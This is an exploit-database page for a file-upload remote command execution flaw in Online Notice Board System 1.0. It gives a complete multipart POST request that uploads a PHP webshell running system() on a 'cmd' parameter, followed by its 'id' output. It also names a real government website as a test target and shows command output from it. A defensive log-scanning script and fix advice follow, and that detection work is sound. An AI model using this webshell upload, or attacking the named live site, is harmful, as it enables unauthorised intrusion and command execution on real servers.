Online Notice Board System 1.0 - Remote Command Execution (RCE) through upload file
CVE: N/A
Category: CWE-78
Price: Not disclosed
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2021-08-19
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080077
Below is a copy:
Online Notice Board System 1.0 - Remote Command Execution (RCE) through upload file
# Date: 2020-08-13
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14317/online-notice-board-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14317&title=Online+Notice+Board+System+in+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux
# Description: allows an attacker to register and upload a shell file.
# Step 1: register with this link http://localhost/onbs/index.php?option=New_user
# Step 2: Enter the information like username, email, data and shell file
# Step 3: then go to this path /onbs/images/[email protected] /shell.php
# Example:
POST /onbs/index.php?option=New_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32859291944290603147363660265
Content-Length: 1705
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onbs/index.php?option=New_user
Cookie: PHPSESSID=b7j92ccoqit6fgrbnjps3rb010
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="n"
test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="e"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="p"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mob"
966555555555
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="gen"
m
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
reading
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
singin
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
playing
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="img"; filename="m.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="yy"
1996
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mm"
6
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="dd"
7
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="save"
Save
-----------------------------32859291944290603147363660265--
# then you will see your shell here
# http://localhost/onbs/images/[email protected] /m.php?cmd=id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# here is a website for test: http://www.sumajktccl.go.tz/onbs/
https://www.sumajktccl.go.tz/onbs/images/[email protected] /re.php?cmd=id
uid=1195(sumacclgo) gid=1188(sumacclgo) groups=1188(sumacclgo)
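As an added example that is not part of the advisory: a Python check a defender can run over web-server access logs. The application stores registration uploads under the web-served /onbs/images/ tree with PHP execution enabled, so any request for a script file below that directory, and above all one carrying the webshell's cmd parameter, is an indicator that the flaw was used. The log lines, the e-mail address in the path and the extension list are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Upload directory named in the advisory, and the extensions a typical
# Apache/PHP setup hands to the PHP engine (assumption: default handler list).
UPLOAD_DIR = "/onbs/images/"
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)          # the upload path contains an encoded space
    if not path.startswith(UPLOAD_DIR):
        return None
    if not path.lower().endswith(SCRIPT_EXTS):
        return None                     # ordinary images are expected here
    # Any executable script fetched from the upload tree is a finding; the
    # 'cmd' parameter used by the advisory's webshell raises the severity.
    params = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "path": path,
        "status": int(m.group("status")),
        "severity": "critical" if "cmd" in params else "high",
        "cmd": params.get("cmd", [None])[0],
    }

def scan(lines):
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample traffic (not real logs); user@example.com is a placeholder
# for the registered e-mail that names the per-user upload directory.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2021:10:00:01 +0000] "POST /onbs/index.php?option=New_user HTTP/1.1" 302 0
203.0.113.5 - - [19/Aug/2021:10:00:05 +0000] "GET /onbs/images/user@example.com%20/m.php?cmd=id HTTP/1.1" 200 71
198.51.100.9 - - [19/Aug/2021:10:01:00 +0000] "GET /onbs/images/user@example.com%20/photo.jpg HTTP/1.1" 200 5120
203.0.113.5 - - [19/Aug/2021:10:02:00 +0000] "GET /onbs/images/user@example.com%20/m.php HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

On the application side the durable fix is to accept only image extensions, verify the file content, store uploads under a random name, and serve the upload directory with script execution disabled.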
Copyright ©2024 Exploitalert.